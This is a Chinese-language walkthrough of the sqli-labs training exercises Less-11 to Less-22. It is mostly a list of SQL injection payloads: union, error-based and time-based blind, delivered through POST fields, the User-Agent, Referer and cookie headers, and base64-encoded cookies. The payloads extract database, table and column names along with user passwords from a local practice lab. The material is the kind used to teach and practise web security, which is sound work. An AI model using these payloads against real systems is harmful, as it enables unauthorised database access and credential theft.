提交账号和密码均为123,执行的sql语句如下。可以用万能密码绕过。注意这里的注释不能用–+
payload:(post方式提交)
uname=admin' order by 2#&passwd=123&submit=Submit
//回显正常
uname=admin' order by 3#&passwd=123&submit=Submit
//回显不正常,字段数为2
uname=-admin' union select 1,2#&passwd=123&submit=Submit
//1和2均为回显位,admin需改为不存在的数据,如-admin
//爆库:
uname=-admin' union select 1,database()#&passwd=123&submit=Submit
//爆表:
uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
//爆列:
uname=-admin' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
爆内容:
uname=-admin' union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin' union select 1,group_concat(password) from users #&passwd=&submit=Submit
与less-11基本相同只是闭合方式改成了("")
payload:
//爆库:
uname=-admin") union select 1,database()#&passwd=123&submit=Submit
//爆表:
uname=-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
//爆列:
uname=-admin") union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
//爆内容:
uname=-admin") union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin") union select 1,group_concat(password) from users #&passwd=&submit=Submit
闭合方式为(’’),没有回显信息,使用报错盲注
payload:
爆库:uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
爆表:uname=admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
爆列:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
爆内容:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
与less-13基本相同,只不过闭合方式为""
payload:
//爆库:
uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
//爆表:
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
//爆列:
uname=admin"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
//爆内容:
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
闭合方式为’’,且不报错,使用时间盲注 注:
if(length(database())=8,1,sleep(3))的意思为长度正确时,直接显示,长度错误时延迟三秒。
if(length(database())=8,sleep(3),1)的意思为长度正确时,延迟三秒,长度错误时直接显示。
payload:
求库长:
uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
爆库:
uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
爆表:
uname=admin' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
爆列:
uname=admin' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
爆内容:
uname=admin' and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
与less-15基本相同,闭合方式换为("")
payload:
//求库长:
uname=admin")and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
//延迟了三秒,长度为8
//爆库:
uname=admin") and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
//爆表:
uname=admin")and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
//爆列:
uname=admin")and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
//爆内容:
uname=admin") and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
这里有坑:数据库会先对uname进行查询操作,存在用户才会允许修改,也就是uname不存在sql注入,passwd才存在注入。
passwd的闭合方式为’’
payload:
//爆库:
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
//爆表:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
//爆列:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit
//爆内容:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(login) from users),0x7e),1)#&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&submit=Submit
//*爆这个表的内容好像会出现问题:You can't specify target table 'users' for update in FROM clause*//
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit
//爆emails表没有出现问题,说明语法没有错误,而是程序做了策略。
HTTP头中的注入:
在user-agent后加入’报错,说明这里是个注入点。
看到源码后,代码中对uname和passwd进行了check_input()函数的处理,所以在输入uname和passwd上进行注入是不行的,但是在代码中,我们看到了
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`,
`username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert);
将user-agent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?首先这里要输入正确的账号和密码才能绕过账号密码判断,才能进入处理uagent部分}
payload:
//爆库:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
//爆表:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
//爆列:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
//爆内容:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(login) from users ),0x7e),1))#
与less-18差不多
在Referer后加入个’发现报错,说明存在注入
payload:
//爆库:
Referer: http://127.0.0.1/sqli/less-19/',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
//爆表:
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
//爆列:
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
//爆内容:
Referer: http://127.0.0.1/sqli/less-19/',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
在cookie上加上’报错,说明cookie为注入点,并且是有回显的。
payload:
Cookie: uname=admin' order by 3#; security_level=0
//正常
Cookie: uname=admin' order by 4#; security_level=0
//不正常,字段数为3
Cookie: uname=-admin' union select 1,2,3#; security_level=0
//1、2、3均为回显位
//爆库:
Cookie: uname=-admin' union select 1,2,database()#; security_level=0
//爆表:
Cookie:uname=-admin' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#; security_level=0
//爆列:
Cookie:uname=-admin' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#; security_level=0
//爆内容:
Cookie:uname=-admin' union select 1,2,(select group_concat(password) from users)#; security_level=0
与less-20基本相同,闭合方式为(’’)只不过cookie值被base64处理过了,并且要使用报错注入。
一个合法的Base64,有着以下特征: 字符串的长度为4的整数倍。 字符串的符号取值只能在A-Z, a-z, 0-9, +, /,=共计65个字符中,且=如果出现就必须在结尾出现.
payload:
//爆库:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSM=; security_level=0
//爆表:
Cookie:uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSwxKSM=; security_level=0
//爆列:
Cookie:uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDEpIw==; security_level=0
//爆内容:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
//明文参考less-13,base64编码直接使用burp自带的编码器。
与less-21基本相同,闭合方式为""
payload:
//爆库:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIw==; security_level=0
//爆表:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpLDEpIw==; security_level=0
//爆列:
Cookie: uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyksMHg3ZSksMSkj; security_level=0
//爆字段:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
//明文参考less-14,base64编码直接使用burp自带的编码器。